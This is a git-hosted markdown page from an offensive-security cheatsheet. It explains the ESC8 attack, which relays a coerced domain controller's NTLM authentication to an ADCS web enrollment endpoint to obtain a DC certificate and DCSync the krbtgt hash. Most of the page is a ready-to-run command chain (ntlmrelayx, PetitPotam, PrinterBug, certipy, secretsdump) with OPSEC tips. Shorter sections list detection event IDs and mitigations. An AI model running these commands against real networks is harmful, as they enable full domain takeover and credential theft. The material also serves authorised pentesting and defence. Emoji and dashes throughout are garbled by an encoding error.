daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-33-esc8-ntlm-relay-to-adcs-http-endpoint.md (5540B)


      1 ---
      2 title: "Attack #33 โ€” ESC8 NTLM Relay to ADCS HTTP Endpoint"
      3 description: "ESC8 is one of the most impactful ADCS attacks โ€” it enables a full domain compromise from unauthenticated or low-privileged access by combining NTLMโ€ฆ"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "credential-access", "ntlm", "relay"]
      7 tools: ["Impacket", "Certipy"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ŸŸข Attack #33 โ€” ESC8 NTLM Relay to ADCS HTTP Endpoint.md"
     11 ---
     12 # ๐ŸŸข Attack #33 โ€” ESC8: NTLM Relay to ADCS HTTP Endpoint
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 ESC8 is one of the **most impactful ADCS attacks** โ€” it enables a full domain compromise from **unauthenticated or low-privileged access** by combining **NTLM coercion** (PetitPotam, PrinterBug) with **NTLM relay** to the CA's Web Enrollment HTTP endpoint. The attacker coerces a Domain Controller to authenticate, relays that authentication to the CA's HTTP enrollment service, and requests a certificate as the DC machine account โ€” then uses that certificate to DCSync.
     19 
     20 ### Attack Chain
     21 
     22 ```
     23 1. Start ntlmrelayx targeting the CA's HTTP enrollment endpoint
     24 2. Coerce DC to authenticate to your listener (PetitPotam/PrinterBug)
     25 3. ntlmrelayx relays DC's NTLM auth to the CA web enrollment
     26 4. CA issues a certificate for the DC machine account
     27 5. Use the DC certificate to authenticate and DCSync
     28 ```
     29 
     30 ***
     31 
     32 ## โš™๏ธ Prerequisites
     33 
     34 | Requirement | Detail |
     35 |---|---|
     36 | **CA Web Enrollment enabled (HTTP)** | `/certsrv/` endpoint accessible over HTTP |
     37 | **No EPA (Extended Protection for Auth)** | EPA must be disabled for relay to work |
     38 | **Coercion capability** | PetitPotam, PrinterBug, DFSCoerce, etc. |
     39 | **Network position** | Can reach both DC and CA |
     40 
     41 ***
     42 
     43 ## ๐Ÿ› ๏ธ Tools
     44 
     45 | Tool | Platform | Notes |
     46 |---|---|---|
     47 | **ntlmrelayx.py** | Linux | `--adcs` flag for certificate enrollment relay |
     48 | **PetitPotam** | Linux | Coerce DC authentication |
     49 | **printerbug.py** | Linux | Alternative coercion |
     50 | **Certipy** | Linux | Relay module for ADCS |
     51 | **Coercer** | Linux | Multi-protocol coercion |
     52 
     53 ***
     54 
     55 ## ๐Ÿ’ป Full Commands
     56 
     57 ### ๐Ÿ”ด Full ESC8 Attack
     58 
     59 ```bash
     60 # โ”€โ”€ Step 1: Start ntlmrelayx targeting CA web enrollment โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     61 ntlmrelayx.py -t http://CA01.corp.local/certsrv/certfnsh.asp \
     62   -smb2support --adcs --template DomainController
     63 
     64 # โ”€โ”€ Step 2: Coerce DC authentication to your listener โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     65 # PetitPotam (unauthenticated on unpatched):
     66 python3 PetitPotam.py ATTACKER_IP DC01.corp.local
     67 
     68 # Or with credentials:
     69 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
     70   ATTACKER_IP DC01.corp.local
     71 
     72 # Or PrinterBug:
     73 printerbug.py corp.local/low_user:'Password1'@DC01.corp.local ATTACKER_IP
     74 
     75 # โ”€โ”€ ntlmrelayx output: โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     76 # [*] SMBD: Received connection from 10.10.10.10
     77 # [*] Relaying to http://CA01.corp.local/certsrv/certfnsh.asp
     78 # [*] Certificate successfully enrolled!
     79 # [*] Base64 certificate: <long_base64_string>
     80 
     81 # โ”€โ”€ Step 3: Save the base64 certificate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     82 echo "<base64_cert>" | base64 -d > dc01.pfx
     83 
     84 # โ”€โ”€ Step 4: Authenticate with the DC certificate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     85 certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
     86 # Returns DC01$ NT hash
     87 
     88 # โ”€โ”€ Step 5: DCSync with DC machine hash โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     89 secretsdump.py corp.local/'DC01$'@DC01.corp.local \
     90   -hashes :<DC01_NTHASH> -just-dc-user krbtgt
     91 ```
     92 
     93 ### ๐Ÿ”ด Using Certipy Relay Module
     94 
     95 ```bash
     96 # โ”€โ”€ Certipy relay (alternative to ntlmrelayx) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     97 certipy relay -ca CA01.corp.local -template DomainController
     98 
     99 # Then coerce with PetitPotam as above
    100 ```
    101 
    102 ***
    103 
    104 ## ๐ŸŽฏ OPSEC Tips
    105 
    106 - **PetitPotam may work unauthenticated** on unpatched DCs โ€” highest impact scenario
    107 - **ESC8 is the quintessential ADCS attack** โ€” shown in every major pentest certification
    108 - **Check for EPA** before attempting โ€” Certipy `find` will report if EPA is enforced
    109 - **The certificate template must be DomainController or Machine** โ€” to get a cert for the DC
    110 
    111 ***
    112 
    113 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    114 
    115 | Event ID | Source | What to Look For |
    116 |---|---|---|
    117 | **4886** | Security Log (CA) | Certificate enrollment for DC machine account from unexpected source |
    118 | **4768** | Security Log (DC) | PKINIT TGT request from unexpected host |
    119 | **4624** | Security Log (DC) | NTLM logon from unexpected source to CA |
    120 
    121 ***
    122 
    123 ## ๐Ÿ”— Attack Chain Context
    124 
    125 ```
    126 [ESC8] โ”€โ”€โ†’ NTLM Relay to CA โ†’ DC certificate โ†’ DCSync โ†’ domain compromise
    127          โ”‚
    128          โ”œโ”€โ”€โ†’ ๐Ÿ–จ๏ธ Coerce: PetitPotam (#41) / PrinterBug (#42)
    129          โ”œโ”€โ”€โ†’ ๐Ÿฉธ DC cert โ†’ DCSync โ†’ KRBTGT โ†’ Golden Ticket
    130          โ”œโ”€โ”€โ†’ ๐Ÿ’ฅ Potentially unauthenticated full domain compromise
    131          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: enable EPA, enforce HTTPS, disable web enrollment
    132 ```
    133 
    134 ***
    135 
    136 > โœ… **Attack #33 โ€” ESC8 complete.**